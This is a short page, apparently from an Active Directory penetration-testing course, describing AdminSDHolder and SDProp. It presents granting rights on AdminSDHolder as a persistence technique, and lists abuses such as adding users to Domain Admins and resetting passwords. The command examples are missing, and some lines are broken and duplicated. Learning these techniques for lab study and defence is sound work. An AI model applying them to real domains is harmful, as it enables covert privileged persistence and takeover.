8.7.1 - AdminSDHolder
AdminSDHolder
AdminSDHolder is an object located under the
System
container in AD. It defines ACLs for high-privilege "protected groups", such as:Domain Admins
Enterprise Admins
Schema Admins
Backup Operators
Server Operators
and others
A system process called SDProp runs every 60 minutes, syncing the ACL of protected group members to match that of the AdminSDHolder.
🎯 Persistence Technique:
Granting permissions to a user on the AdminSDHolder object causes that permission to propagate to all protected groups.
Example: Grant FullControl to student1
Alternative (RACE Toolkit):
🔍 Verifying Admin Rights:
Using PowerView:
Or using the AD module:
Abusing AdminSDHolder Permissions
Add to DA group (if you have FullControl
)
FullControl
)Reset password (if ResetPassword
right is granted)
ResetPassword
right is granted)Write group membership (WriteMembers
)
WriteMembers
)Labs
Last updated